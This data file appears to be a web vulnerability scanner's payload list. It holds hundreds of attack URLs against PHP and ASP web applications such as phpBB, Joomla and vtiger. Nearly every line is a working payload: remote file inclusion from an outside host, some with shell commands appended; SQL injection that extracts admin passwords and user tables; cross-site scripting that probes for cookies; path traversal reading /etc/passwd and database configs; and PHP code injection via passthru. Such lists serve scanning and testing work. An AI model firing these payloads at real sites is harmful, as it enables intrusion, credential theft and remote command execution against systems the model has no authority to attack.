include/prodler.class.php?sPath=http://www.yxlink.com/nvs_test.txt???
include/rootGui.inc.php?header=http://www.yxlink.com/nvs_test.txt
include/scripts/export_batch.inc.php?DIR=http://www.yxlink.com/nvs_test.txt
include/scripts/run_auto_suspend.cron.php?DIR=http://www.yxlink.com/nvs_test.txt
include/scripts/send_email_cache.php?DIR=http://www.yxlink.com/nvs_test.txt
include/startup.inc.php?root_path=http://www.yxlink.com/nvs_test.txt?
include/themes/themefunc.php?myNewsConf[path][sys][index]=http://www.yxlink.com/nvs_test.txt?
include/thumb.php?x=1&y=/../../../config&dir=config_db.php
include/timesheet.php?config[include_dir]=http://www.yxlink.com/nvs_test.txt
include/top_graph_header.php?config[library_path]=http://www.yxlink.com/nvs_test.txt
include/urights.php?CRM_inc=http://www.yxlink.com/nvs_test.txt
include/yui/uploader/assets/uploader.swf?allowedDomain=\x22})))}catch(e){alert(document.domain);}//
includes
includes/adminAttachments.php?GlobalSettings[templatesDirectory]=@RFIUR
includes/adminBackupdatabase.php?GlobalSettings[templatesDirectory]=http://www.yxlink.com/nvs_test.txt
includes/adminBanned.php?GlobalSettings[templatesDirectory]=http://www.yxlink.com/nvs_test.txt
includes/adminBoards.php?GlobalSettings[templatesDirectory]=http://www.yxlink.com/nvs_test.txt
includes/adminPolls.php?GlobalSettings[templatesDirectory]=http://www.yxlink.com/nvs_test.txt
includes/adminSensored.php?GlobalSettings[templatesDirectory]=http://www.yxlink.com/nvs_test.txt
includes/admin_board2.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt?ls
includes/admin_logger.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt?ls
includes/adodb/back/adodb-postgres7.inc.php?ADODB_DIR=http://www.yxlink.com/nvs_test.txt?
includes/adovbs.inc
includes/ajax_listado.php?urlModulo=http://www.yxlink.com/nvs_test.txt
includes/archive/archive_topic.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
includes/bbcb_mg.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt?
includes/begin.inc.php?PagePrefix=http://www.yxlink.com/nvs_test.txt
includes/blogger.php?path_prefix=http://www.yxlink.com/nvs_test.txt
includes/class/class_tpl.php?cache_file=http://www.yxlink.com/nvs_test.txt?
includes/class_block.php?file=http://www.yxlink.com/nvs_test.txt
includes/class_humanverify.php?chosenlib=http://www.yxlink.com/nvs_test.txt
includes/class_paid_subscription.php?methodinfo[classname]=http://www.yxlink.com/nvs_test.txt
includes/class_template.php?quezza_root_path=http://www.yxlink.com/nvs_test.txt
includes/classes/pctemplate.php?pcConfig[smartyPath]=http://www.yxlink.com/nvs_test.txt?cmd
includes/common.inc.php?CONFIG[BASE_PATH]=http://www.yxlink.com/nvs_test.txt
includes/common.php?module_root_path=http://www.yxlink.com/nvs_test.txt?
includes/common.php?root=http://www.yxlink.com/nvs_test.txt?
includes/common.php?root=http://www.yxlink.com/nvs_test.txt??
includes/common.php?root_path=http://www.yxlink.com/nvs_test.txt
includes/config.inc.php?racineTBS=http://www.yxlink.com/nvs_test.txt
includes/config/master.inc.php?fm_data[root]=http://www.yxlink.com/nvs_test.txt
includes/connection.inc.php?PagePrefix=http://www.yxlink.com/nvs_test.txt
includes/db_adodb.php?baseDir=http://www.yxlink.com/nvs_test.txt
includes/db_connect.php?baseDir=http://www.yxlink.com/nvs_test.txt
includes/dbal.php?eqdkp_root_path=http://www.yxlink.com/nvs_test.txt
includes/events.inc.php?PagePrefix=http://www.yxlink.com/nvs_test.txt
includes/footer.html.inc.php?tc_config[app_root]=http://www.yxlink.com/nvs_test.txt?
includes/footer.inc.php?PagePrefix=http://www.yxlink.com/nvs_test.txt
includes/footer.php3?my_footer=http://www.yxlink.com/nvs_test.txt
includes/footer.php?PHPGREETZ_INCLUDE_DIR=http://www.yxlink.com/nvs_test.txt
includes/functions.inc.php?sitepath=http://www.yxlink.com/nvs_test.txt?
includes/functions.php?classfile=http://www.yxlink.com/nvs_test.txt
includes/functions.php?location=http://www.yxlink.com/nvs_test.txt
includes/functions.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
includes/functions/auto_email_notify.php?path_prefix=http://www.yxlink.com/nvs_test.txt
includes/functions/html_generate.php?path_prefix=http://www.yxlink.com/nvs_test.txt
includes/functions/master.inc.php?fm_data[root]=http://www.yxlink.com/nvs_test.txt
includes/functions/validations.php?path_prefix=http://www.yxlink.com/nvs_test.txt
includes/functions_admin.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt?
includes/functions_cms.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
includes/functions_install.php?vwar_root=http://www.yxlink.com/nvs_test.txt
includes/functions_kb.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
includes/functions_mod_user.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt?
includes/functions_portal.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
includes/functions_user_viewed_posts.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt?
includes/global.php?nbs=http://www.yxlink.com/nvs_test.txt?
includes/header.inc.php?PagePrefix=http://www.yxlink.com/nvs_test.txt
includes/header.inc.php?dateiPfad=http://www.yxlink.com/nvs_test.txt
includes/header.php3?my_header=http://www.yxlink.com/nvs_test.txt
includes/include_once.php?include_file=http://www.yxlink.com/nvs_test.txt
includes/init.php?includepath=http://www.yxlink.com/nvs_test.txt?
includes/iplogger.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt?ls
includes/js/tiny_mce
includes/js/uploadify/uploadify.swf?uploadifyID=00%22%29%29;}catch%28e%29{alert%281%29;}//%28%22&movieName=%22])}catch(e){if(!window.x){window.x=1;alert(2)}}//&.swf
includes/kb_constants.php?module_root_path=http://www.yxlink.com/nvs_test.txt
includes/kb_constants.php?module_root_path=http://www.yxlink.com/nvs_test.txt?cmd=ls
includes/lang/language.php?path_to_root=http://www.yxlink.com/nvs_test.txt
includes/lib-account.inc.php?CONF_CONFIG_PATH=http://www.yxlink.com/nvs_test.txt?
includes/lib-group.inc.php?CONF_CONFIG_PATH=http://www.yxlink.com/nvs_test.txt?
includes/lib-log.inc.php?CONF_CONFIG_PATH=http://www.yxlink.com/nvs_test.txt?
includes/lib-mydb.inc.php?CONF_CONFIG_PATH=http://www.yxlink.com/nvs_test.txt?
includes/lib-template-mod.inc.php?CONF_CONFIG_PATH=http://www.yxlink.com/nvs_test.txt?
includes/lib-themes.inc.php?CONF_CONFIG_PATH=http://www.yxlink.com/nvs_test.txt?
includes/logger_engine.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
includes/menuleft.inc.php?PagePrefix=http://www.yxlink.com/nvs_test.txt
includes/mkb.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt?ls
includes/morcegoCMS/adodb/adodb.inc.php?path=http://www.yxlink.com/nvs_test.txt
includes/morcegoCMS/morcegoCMS.php?fichero=http://www.yxlink.com/nvs_test.txt
includes/move.php?GlobalSettings[templatesDirectory]=http://www.yxlink.com/nvs_test.txt
includes/mx_common.php?module_root_path=http://www.yxlink.com/nvs_test.txt?
includes/openid/Auth/OpenID/BBStore.php?openid_root_path=http://www.yxlink.com/nvs_test.txt
includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.yxlink.com/nvs_test.txt
includes/pafiledb_constants.php?module_root_path=http://www.yxlink.com/nvs_test.txt
includes/pages.inc.php?PagePrefix=http://www.yxlink.com/nvs_test.txt
includes/phpdig/includes/config.php?relative_script_path=http://www.yxlink.com/nvs_test.txt
includes/plupload//plupload.flash.swf?id=\x22));}catch(e){alert(1);}//
includes/pm_popup.php?u1=[XSS]&m1=\x22><script>alert(333)</script>&m2=&m3=[XSS]&m4=[XSS]
includes/poll.php?GlobalSettings[templatesDirectory]=http://www.yxlink.com/nvs_test.txt
includes/profilcp_constants.php?module_root_path=http://www.yxlink.com/nvs_test.txt?
includes/session.php?baseDir=http://www.yxlink.com/nvs_test.txt
includes/settings.inc.php?approot=http://www.yxlink.com/nvs_test.txt
includes/swfupload//swfupload.swf?movieName=%22]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%281%29;//
includes/swfupload//swfupload_f8.swf?movieName=%22]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%281%29;//
includes/swfupload//swfupload_f9.swf?movieName=%22]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%281%29;//
includes/template.php?myevent_path=http://www.yxlink.com/nvs_test.txt
includes/themen_portal_mitte.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
includes/tiny_mce
includes/tinymce
includes/tumbnail.php?config[root_ordner]=http://www.yxlink.com/nvs_test.txt?
includes/usercp_register.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt?
includes/usercp_viewprofile.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt?
includes/xhtml.php?d_root=http://www.yxlink.com/nvs_test.txt
includes/xhtml.php?d_root=http://www.yxlink.com/nvs_test.txt?
incomming
index
index.asp?inc='><script>alert(222)</script>
index.asp?inc=forumread&article='><script>alert(333)</script>
index.asp?inc=profile&searchtext='><script>alert(333)</script>
index.cgi?action=browse&host=localhost&num=99999%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E
index.html
index.html%20
index.html~
index.inc.php?PATH_Includes=http://www.yxlink.com/nvs_test.txt
index.js0x70
index.php/123
index.php/>\x22><ScRiPt>alert(2222)</ScRiPt>
index.php/\x22><script>alert(666)</script>
index.php/\x5C\x22><script><script>alert(document.cookie)</script><
index.php/content/advancedsearch/?SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search
index.php/content/search/?SectionID=3&SearchText=<script>alert(document.cookie)</script>
index.php/list-1%20and%201=1.html
index.php/list-1%20and%201=2.html
index.php/page-4 union all select 1,2,3,4,md5(333),adminpass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43 from kc_admin-100.html
index.php/tools-staticPage.html?filename=../../../../../../../../../../etc/passwd
index.php/weblinks-categories?id=0%20%29%20union%20select%20md5(333)%20from%20%60k59cv_users%60%20--%20%29
index.php3?Application_Root=http://www.yxlink.com/nvs_test.txt
index.php?1=lol&PAGES[lol]=http://www.yxlink.com/nvs_test.txt
index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000
index.php?AML_opensite=http://www.yxlink.com/nvs_test.txt
index.php?AMV_openconfig=1&AMV_serverpath=http://www.yxlink.com/nvs_test.txt
index.php?CID=1 '
index.php?CONFIG[MWCHAT_Libs]=http://www.yxlink.com/nvs_test.txt?
index.php?ConfigDir=http://www.yxlink.com/nvs_test.txt
index.php?DIR_PLUGINS=http://www.yxlink.com/nvs_test.txt
index.php?G_JGALL[inc_path]=http://www.yxlink.com/nvs_test.txt%00
index.php?HomeDir=http://www.yxlink.com/nvs_test.txt
index.php?Lang=AR&Page=http://www.yxlink.com/nvs_test.txt
index.php?Madoa=http://www.yxlink.com/nvs_test.txt?
index.php?RP_PATH=http://www.yxlink.com/nvs_test.txt
index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
index.php?_m=mod_auth&_a=auth_callback&type=../../robots.txt%00
index.php?a=day_view&date=%22%20onmouseover=%22javascript:alert%281111%29%22
index.php?abg_path=http://www.yxlink.com/nvs_test.txt?
index.php?abs_path=http://www.yxlink.com/nvs_test.txt
index.php?ac=search&at=list&att[a]=nvs
index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,md5(333333),27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20information_schema.tables;%23
index.php?ac=search&at=taglist&tagkey=%2527,tags)%20or(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,table_name,0x27,0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
index.php?act=Question&id=1%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
index.php?act=task&ck='
index.php?action=DetailView&module=Calendar&record=116&activity_mode=Task%22%20%20style=%22background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%22%20x=%22XSSSSSSSS&parenttab=My
index.php?action=DetailView&module=Leads&record=%3Cscript%3Ealert(1111)%3C/script%3E
index.php?action=ListView&module=Calendar&record=116&viewname=19&start=1371b1\x22%20onmouseover=\x22alert(0)\x22%20a%3db%22&parenttab=My%20Home%20Page
index.php?action=index&module=Calendar&view=week&hour=0&day=5%27%29%22%20%20onmouseover%3d%22alert%28/XSS/)%22%20x
index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=9%27%29%22%20%20onmouseover%3d%22alert%28/XSS/)%22%20x=%22&year=2010&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1
index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=9&year=2010&viewOption=listview%27%29%22%20%20onload%3d%22alert%28/XSS/%29%22%20x=%22&subtab=event&parenttab=My&onlyforuser=1
index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=9&year=2010&viewOption=listview&subtab=event%27%20onmouseover%3d%27javascript:alert%28/XSS/%29%27%20x=%27&parenttab=My&onlyforuser=1
index.php?action=index&module=Calendar&view=week'%20onload%3d%22alert%28/XSS/)%22%20x=%22&hour=0&day=5&month=9&year=2010&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1
index.php?action=search&searchFor=\x5C\x22><script>alert('Vulnerable')</script >
index.php?action=storenew&username=<script>alert('Vulnerable')</script>
index.php?action=view&view=category&catid=-1%20UNION%20SELECT%20null,null,md5(333),null,null,null,null,null%20FROM%20arkidb_users%20WHERE%20id=1&catflag=1&sublevel=1
index.php?adduser=true&lang=http://www.yxlink.com/nvs_test.txt
index.php?adodb=http://www.yxlink.com/nvs_test.txt
index.php?ads_file=http://www.yxlink.com/nvs_test.txt
index.php?app=article&ac=admin/post&ts=list
index.php?app=widget&mod=Category&act=getChild&model_name=Schedule&method=runSchedule&id[task_to_run]=addons/Area)->getAreaList();phpinfo();%23
index.php?arquivo=http://www.yxlink.com/nvs_test.txt
index.php?back=http://www.yxlink.com/nvs_test.txt
index.php?base==http://www.yxlink.com/nvs_test.txt
index.php?basePath=http://www.yxlink.com/nvs_test.txt
index.php?bibtexrootrel=http://www.yxlink.com/nvs_test.txt?
index.php?blog_dc_path=http://www.yxlink.com/nvs_test.txt
index.php?blog_theme=http://www.yxlink.com/nvs_test.txt
index.php?body=http://www.yxlink.com/nvs_test.txt
index.php?c=2-2%20UNION%20ALL%20SELECT%202,md5(333)%20||%20password,%203,4,5,6%20FROM%20login%20limit%201%20--%20x
index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c36d90d8e9&key=1&comp=1&min='&max=1
index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c36d90d8e9&key=1&comp=1&min=1&max='
index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c36d90d8e9&key=1&comp=1&min=1&max=><script>var%20xss=31337;alert(xss);</script>
index.php?c=ueditor&f=remote_image&upfile=http://www.yxlink.com/nvs_test.txt?.php
index.php?catid=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;
index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc
index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc
index.php?class_path=http://www.yxlink.com/nvs_test.txt?
index.php?classified_path=http://www.yxlink.com/nvs_test.txt?
index.php?cms=http://www.yxlink.com/nvs_test.txt?
index.php?comment-2'/**/and/**/ExtractValue(0x64,concat(0x01,(select/**/md5(333))))/**/order/**/by/**/'1-ask-commentlist.html
index.php?config=1&base_datapath=http://www.yxlink.com/nvs_test.txt
index.php?configFile=http://www.yxlink.com/nvs_test.txt
index.php?config[\x5C\x22sipssys\x5C\x22]=http://www.yxlink.com/nvs_test.txt
index.php?config[root_ordner]=http://www.yxlink.com/nvs_test.txt?&cmd=id
index.php?config[root_ordner]=http://www.yxlink.com/nvs_test.txt?cmd=id
index.php?config_atkroot=http://www.yxlink.com/nvs_test.txt
index.php?configuration=http://www.yxlink.com/nvs_test.txt
index.php?content=showrecipe&id=-3%20union%20select%20md5(12345678901),2,3,4,5--
index.php?content=showrecipe&id=-3%20union%20select%20md5(333),2,3,4,5--
index.php?custom_admin_path=http://www.yxlink.com/nvs_test.txt?
index.php?dateiPfad=http://www.yxlink.com/nvs_test.txt?&cmd=ls
index.php?de=http://www.yxlink.com/nvs_test.txt
index.php?default_path=http://www.yxlink.com/nvs_test.txt
index.php?dept=http://www.yxlink.com/nvs_test.txt
index.php?dir=<script>alert('Vulnerable')</script>
index.php?do=http://www.yxlink.com/nvs_test.txt
index.php?doc=unote&id=%27
index.php?download=/etc/passwd
index.php?download=/windows/win.ini
index.php?download=/winnt/win.ini
index.php?err=3&email=\x5C\x22><script>alert(document.cookie)</script>
index.php?exec=http://www.yxlink.com/nvs_test.txt?
index.php?ext=http://www.yxlink.com/nvs_test.txt
index.php?faq_path=http://www.yxlink.com/nvs_test.txt?&cmd=id
index.php?file=Liens&op=\x5C\x22><script>alert('Vulnerable');</script>
index.php?file=Liens&op=phpinfo
index.php?file=index.php
index.php?file_name[]=http://www.yxlink.com/nvs_test.txt?
index.php?file_path=http://www.yxlink.com/nvs_test.txt
index.php?file_path=http://www.yxlink.com/nvs_test.txt?
index.php?fileloc=http://www.yxlink.com/nvs_test.txt
index.php?from=http://www.yxlink.com/nvs_test.txt
index.php?func=http://www.yxlink.com/nvs_test.txt
index.php?func=http://www.yxlink.com/nvs_test.txt?
index.php?function=banner_out&id=10000/**/LIMIT/**/0/**/UNION/**/SELECT/**/1,2,concat(0x687474703A2F2F,md5(333),0x5F,pass),4,5,6,7,8,9/**/FROM/**/phpbp_users/**/LIMIT/**/1/*
index.php?function=custom&custom=http://www.yxlink.com/nvs_test.txt
index.php?function=http://www.yxlink.com/nvs_test.txt
index.php?gOo=http://www.yxlink.com/nvs_test.txt
index.php?gen=http://www.yxlink.com/nvs_test.txt
index.php?get=http://www.yxlink.com/nvs_test.txt
index.php?home_name=http://www.yxlink.com/nvs_test.txt
index.php?id=-1 UNION SELECT 1,2,3,MD5(333)
index.php?id=-1 UNION%20SELECT%20md5(333),md5(333),md5(333),md5(333)
index.php?id=http://www.yxlink.com/nvs_test.txt
index.php?ilang=http://www.yxlink.com/nvs_test.txt?
index.php?inc=http://www.yxlink.com/nvs_test.txt
index.php?inc_dir=http://www.yxlink.com/nvs_test.txt
index.php?includeDir=http://www.yxlink.com/nvs_test.txt
index.php?includeFooter=http://www.yxlink.com/nvs_test.txt
index.php?include_location=http://www.yxlink.com/nvs_test.txt
index.php?includesdir=http://www.yxlink.com/nvs_test.txt
index.php?ind=',userid='1
index.php?insPath=http://www.yxlink.com/nvs_test.txt
index.php?lang=http://www.yxlink.com/nvs_test.txt
index.php?language=en&main_page=http://www.yxlink.com/nvs_test.txt
index.php?language=http://www.yxlink.com/nvs_test.txt?
index.php?libDir=http://www.yxlink.com/nvs_test.txt
index.php?lizge=http://www.yxlink.com/nvs_test.txt?&cmd=ls
index.php?lng=http://www.yxlink.com/nvs_test.txt
index.php?load=http://www.yxlink.com/nvs_test.txt
index.php?loadpage=http://www.yxlink.com/nvs_test.txt
index.php?m=contacts&a=addedit&contact_id=0&company_id=1&company_name=%22%20onmouseover=%22javascript:alert%281111%29%22
index.php?m=contacts&search_string=0%27%29%20UNION%20SELECT%20md5(333),2,3,4,5,6,7,8, 9,10,11%20INTO%20OUTFILE%20%27file.txt%27%20--%202
index.php?m=contacts&search_string=0%27%29%20UNION%20SELECT%20md5(333),2,3,4,5,6,7,8,9,10,11--
index.php?m=contacts&where=%27%29%20UNION%20SELECT%20md5(333),2,3,4,5,6,7,8,9,10,11--
index.php?m=departments&dept_id=%27%20UNION%20SELECT%20md5(333)%20INTO%20OUTFILE% 20%27/tmp/file.txt%27%20--%202
index.php?m=departments&dept_id=%27%20UNION%20SELECT%20md5(333)--
index.php?m=member&c=index&a=register&siteid=1
index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php
index.php?m=tag&a=view&name=ccccc%bf'and/**/(select/**/1/**/from/**/(select/**/count(*),concat(md5(3333),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)%23
index.php?main_tabid=1&main_content=http://www.yxlink.com/nvs_test.txt
index.php?may=http://www.yxlink.com/nvs_test.txt
index.php?menuitem=26&domeinvraag=\x22><script>alert(333)</script>&aktie=Zoek&idx=23
index.php?menuitem=29+AND+1=2+UNION+ALL+SELECT+md5(333)--
index.php?method='
index.php?middle=http://www.yxlink.com/nvs_test.txt
index.php?mode=http://www.yxlink.com/nvs_test.txt
index.php?mode=http://www.yxlink.com/nvs_test.txt?&cmd=
index.php?modpath=http://www.yxlink.com/nvs_test.txt
index.php?module=Calendar&action=CalendarAjax&file=ListView&ajax=changestate&viewname=10\x22'%20onmouseover=alert(/XSS/)%20x='&errormsg=
index.php?module=Calendar&action=EditView&return_module=Contacts&return_action=DetailView&activity_mode=Events&return_id=29&contact_id=><script>alert(1)</script>d3ef7f5e017&account_id=16&parenttab=Marketing
index.php?module=Calendar&action=EditView&return_module=Leads&return_action=DetailView&activity_mode=Events&return_id=37&parent_id=37\x22><script>alert(/XSS/)</script>&parenttab=Marketin
index.php?module=Campaigns&searchtype=BasicSearch&search_field=campaignname&query=truef1de8%22%20onmouseover%3d%22alert%281%29%22%2007&search_text=test&action=index&parenttab=Marketing&search_cnt=
index.php?module=Dashboard&action=index&display_view=50%22%20%20style=%22background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%22%20x=%22XSSSSSSSS&pbss_edit=true
index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*
index.php?module=PostWrap&page=http://www.yxlink.com/nvs_test.txt
index.php?module=Potentials&action=ListView&date_closed=2006-01'><script>alert(1)</script>&sales_stage=Other&query=true&type=dbrd&owner=admin&viewname=10
index.php?module=Potentials&action=ListView&leadsource=--None--'><script>alert(1)</script>&query=true&type=dbrd&viewname=10
index.php?module=Potentials&action=ListView&sales_stage=Prospect'><script>alert(/XSS/)</script>x&closingdate_start=2001-01-01&closingdate_end=2100-01-01&query=true&type=dbrd&owner=admin&viewname=10
index.php?module=Potentials&action=ListView&sales_stage=Prospecting&closingdate_start=2001-01-01&closingdate_end=2100-01-01&query=true&type=db%27%20onmouseover%3d%27javascript:alert%28/XSS/%29%27%20x=%27&owner=admin&viewname=10
index.php?module=Potentials&action=ListView&sales_stage=Prospecting&closingdate_start=2001-01-01&closingdate_end=2100-01-01&query=true&type=dbrd&owner=admin%27%20onmouseover%3d%27alert(/XSS/)%27%2520x%253d%27&viewname=10
index.php?module=Potentials&action=ListView&sales_stage=Prospecting&closingdate_start=2001-01-01&closingdate_end=2100-01-01aa8ed'><script>alert(/xss/)</script>e8e16680dfc&query=true&type=dbrd&owner=admin&viewname=10
index.php?module=Potentials&action=ListView&sales_stage=Prospecting&closingdate_start=2001-01-0189b81'><script>alert(1)</script>&closingdate_end=2100-01-01&query=true&type=dbrd&owner=admin&viewname=1
index.php?module=Reports&action=SaveAndRun&record=1&folderid=17920%22%20%20style=%22background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%22%20x=%22XSSSSSSSS
index.php?module=Settings&action=createnewgroup&returnaction=listgroups&parenttab=Settings&mode=edit&groupId=2%22%20%20style=%22background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%22%20x=%22XSSSSSSSS
index.php?module=Settings&action=createrole&parenttab=Settings&parent=H%22%20style=%22background-image:url('javascript:alert(0)');width:1000px;height:1000px;display:block;
index.php?module=Settings&action=profilePrivileges&mode=view%22%3E%3Cscript%3Ealert%281%29%3C/script%3E&parenttab=Settings&profileid=1
index.php?module=Settings&action=profilePrivileges&parenttab=Settings&profileid=1%3b}}alert(/XSS/)%3bfunction+xss(){x%3d=0;if(x){x%3d1&mode=view
index.php?module=com_vtiger_workflow&action=editworkflow&workflow_id=1&return_url=\x22><script>alert(/XSS/)</script>
index.php?module=com_vtiger_workflow&action=editworkflow&workflow_id=1'\x22><script>alert(/XSS/)</script>&return_url=1
index.php?module=search&user=search&search=%22%3E%3Ch1%3EXSS%3C%2Fh1%3E&alternate=local&mod_title=all&submit=Search
index.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
index.php?news7[\x5C\x22functions\x5C\x22]=http://www.yxlink.com/nvs_test.txt
index.php?news_include_path=http://www.yxlink.com/nvs_test.txt
index.php?offset=[%20Problem%20Here%20]
index.php?open=http://www.yxlink.com/nvs_test.txt
index.php?option=>\x22><script>alert(33333)</script>&Itemid=1
index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select+1+from+(select+count(*),+concat((select+(select+md5(333))+from+joomla_users+LIMIT+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
index.php?option=com_custompages&cpage=http://www.yxlink.com/nvs_test.txt?
index.php?option=com_frontpage&Itemid=>\x22><script>alert(2222)</script>
index.php?option=com_fss&view=test&prodid=777777.7'+union+all+select+77777777777777%2C77777777777777%2C77777777777777%2Cmd5(333)%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777--+D4NB4R
index.php?option=com_spidercatalog&amp;amp;product_id=-1%27%20or%201%3d1%2b%28select%201%20and%20row%281%2c1%29%3E%28select%20count%28*%29%2cconcat%28CONCAT%md5%28333%29,0x3D,database%28%29,0x3D,0x3D,0x3D%29%2c1111%2cfloor%28rand%28%29*2%29%29x%20from%20%28select%201%20union%20select%202%29a%20group%20by%20x%20limit%201%29%29%2b%27&amp;amp;view=showproduct&amp;amp;page_num=1&amp;amp;back=1
index.php?option=search&searchword=<script>alert(document.cookie);</script>
index.php?page=http://www.yxlink.com/nvs_test.txt
index.php?page=http://www.yxlink.com/nvs_test.txt%00
index.php?page[path]=http://www.yxlink.com/nvs_test.txt?&cmd=ls
index.php?pagehttp://www.yxlink.com/nvs_test.txt
index.php?pagename=http://www.yxlink.com/nvs_test.txt
index.php?pager=http://www.yxlink.com/nvs_test.txt
index.php?pagina=http://www.yxlink.com/nvs_test.txt?
index.php?path_to_folder=http://www.yxlink.com/nvs_test.txt?cmd=id
index.php?pathdir=http://www.yxlink.com/nvs_test.txt
index.php?pg=http://www.yxlink.com/nvs_test.txt
index.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
index.php?plugin=http://www.yxlink.com/nvs_test.txt
index.php?plugins&q=imgurl&url=QGltZ3VybEAvY29yZS9jb21tb24uaW5jLnBocA==
index.php?principal=http://www.yxlink.com/nvs_test.txt
index.php?proMod=http://www.yxlink.com/nvs_test.txt
index.php?proMod=http://www.yxlink.com/nvs_test.txt?cmd
index.php?project=http://www.yxlink.com/nvs_test.txt
index.php?q=test'union%20select%20md5(333),uname,upass%20from%20appcms_admin_list%20where%20uid%20like%20'
index.php?r=default/index/search&keywords=a%2527)%20and/**/(select/**/1/**/from/**/(select/**/count(*),concat(md5(3333),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)%23&type=all
index.php?rep=<script>alert(document.cookie)</script>
index.php?repinc=http://www.yxlink.com/nvs_test.txt?
index.php?resources/locale/messages.php.
index.php?root_prefix=http://www.yxlink.com/nvs_test.txt
index.php?section=http://www.yxlink.com/nvs_test.txt
index.php?showforum=1&prune_day=100&sort_by=Z-A&sort_key=[sqlgoeshere]
index.php?site=http://www.yxlink.com/nvs_test.txt
index.php?site=squads&getsquad=Where+1=0+Union+Select+1,1,md5(333),1,password,1+from+[PREFIX]_user/*
index.php?site_path=http://www.yxlink.com/nvs_test.txt
